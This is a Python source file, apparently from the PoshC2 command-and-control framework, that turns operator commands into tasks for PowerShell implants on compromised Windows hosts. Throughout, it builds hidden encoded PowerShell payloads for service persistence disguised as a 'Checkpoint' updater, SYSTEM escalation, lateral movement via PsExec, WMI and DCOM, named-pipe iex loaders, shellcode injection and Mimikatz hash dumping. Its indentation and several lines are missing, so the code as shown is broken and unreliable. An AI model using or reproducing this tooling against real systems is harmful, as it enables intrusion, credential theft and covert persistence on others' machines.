
483 lines
23 KiB

import base64, re, traceback, os, sys
from Alias import ps_alias
from Colours import Colours
from Utils import randomuri, validate_sleep_time
from DB import new_task, update_sleep, get_history, select_item, update_label, unhide_implant, update_item, kill_implant, get_implantbyid, get_implantdetails, get_pid, get_c2server_all, get_newimplanturl, get_allurls, get_sharpurls, new_urldetails
from AutoLoads import check_module_loaded, run_autoloads
from Help import COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6, posh_help7, posh_help8
from Config import ModulesDirectory, PayloadsDirectory, POSHDIR, ROOTDIR
from Core import readfile_with_completion, filecomplete
from Opsec import ps_opsec
from Payloads import Payloads
from Utils import argp, load_file, gen_key
from TabComplete import readline, tabCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print ("Error loading Stage2-Core.ps1: %s" % e)
run_autoloads(command, randomuri, user)
# alias mapping
for alias in ps_alias:
if alias[0] == command.lower()[:len(command.rstrip())]:
command = alias[1]
# opsec failures
for opsec in ps_opsec:
if opsec == command.lower()[:len(opsec)]:
print (Colours.RED)
print ("**OPSEC Warning**")
impid = get_implantdetails(randomuri)
ri = raw_input("Do you want to continue running - %s? (y/N) " % command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
if ri.lower() == "y":
command = command
if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '').strip()
if not validate_sleep_time(new_sleep):
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
new_task(command, user, randomuri)
update_sleep(new_sleep, randomuri)
elif (command.lower().startswith('label-implant')):
label = command.replace('label-implant ', '')
update_label(label, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpful = string.split(posh_help, '\n')
for line in helpful:
if searchterm in line.lower():
print (line)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
elif "install-servicelevel-persistencewithproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "install-servicelevel-persistence" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, user, randomuri)
elif "remove-servicelevel-persistence" in command.lower():
new_task("sc.exe delete CPUpdater", user, randomuri)
# psexec lateral movement
elif "get-implantworkingdirectory" in command.lower():
new_task("pwd", user, randomuri)
elif "get-system-withproxy" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system-withdaisy" in command.lower():
C2 = get_c2server_all()
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "get-system" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, user, randomuri)
cmd = "sc.exe start CPUpdaterMisc"
new_task(cmd, user, randomuri)
cmd = "sc.exe delete CPUpdaterMisc"
new_task(cmd, user, randomuri)
elif "quit" in command.lower():
ri = raw_input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
if ri == "":
if ri.lower() == "y":
elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-psexecpayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# wmi lateral movement
elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-wmipayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
new_task(cmd, user, randomuri)
# dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower():
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
startup(user, "Need to run createproxypayload first")
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-dcompayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
new_task(pscommand, user, randomuri)
# runas payloads
elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
startup(user, "Need to run createdaisypayload first")
elif "invoke-runasproxypayload" in command.lower():
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif "invoke-runaspayload" in command.lower():
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipe.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
new_task(pscommand, user, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (posh_help)
elif command.lower() == "help 1":
print (posh_help1)
elif command.lower() == "help 2":
print (posh_help2)
elif command.lower() == "help 3":
print (posh_help3)
elif command.lower() == "help 4":
print (posh_help4)
elif command.lower() == "help 5":
print (posh_help5)
elif command.lower() == "help 6":
print (posh_help6)
elif command.lower() == "help 7":
print (posh_help7)
elif command.lower() == "help 8":
print (posh_help8)
elif "get-pid" in command.lower():
pid = get_implantdetails(randomuri)
print (pid[8])
elif "upload-file" in command.lower():
source = ""
destination = ""
s = ""
nothidden = False
if command.strip().lower() == "upload-file":
source = readfile_with_completion("Location of file to upload: ")
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = readfile_with_completion("Location of file to upload: ")
destination = raw_input("Location to upload to: ")
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
with open(source, "rb") as source_file:
s = source_file.read()
if s:
sourceb64 = base64.b64encode(s)
destination = destination.replace("\\","\\\\")
print ("")
print ("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
print("Source file could not be read or was empty")
except Exception as e:
print ("Error with source file: %s" % e)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
elif "unhide-implant" in command.lower():
elif "hide-implant" in command.lower():
elif "migrate" in command[:7].lower():
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, user, params)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif "invoke-daisychain" in command.lower():
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
print ("Now use createdaisypayload")
elif "inject-shellcode" in command.lower():
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
path = raw_input("Location of shellcode file: ")
t = tabCompleter()
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "listmodules" in command.lower():
print (os.listdir("%s/Modules/" % POSHDIR))
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
elif (command.lower() == "ps") or (command.lower() == "ps "):
new_task("get-processlist", user, randomuri)
elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key()
sharpurls = get_sharpurls()
sharpurl = select_item("HostnameIP", "C2Server")
new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), user, randomuri)
print ("git clone https://github.com/nettitude/SharpSocks.git")
print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
elif (command.lower() == "history") or command.lower() == "history ":
startup(user, get_history())
elif "reversedns" in command.lower():
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
elif "createdaisypayload" in command.lower():
createdaisypayload(user, startup)
elif "createproxypayload" in command.lower():
createproxypayload(user, startup)
elif "createnewpayload" in command.lower():
createproxypayload(user, startup)
if command:
new_task(command, user, randomuri)
def migrate(randomuri, user, params=""):
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
arch = "86"
if implant_comms == "Normal":
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch))
elif implant_comms == "Proxy":
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)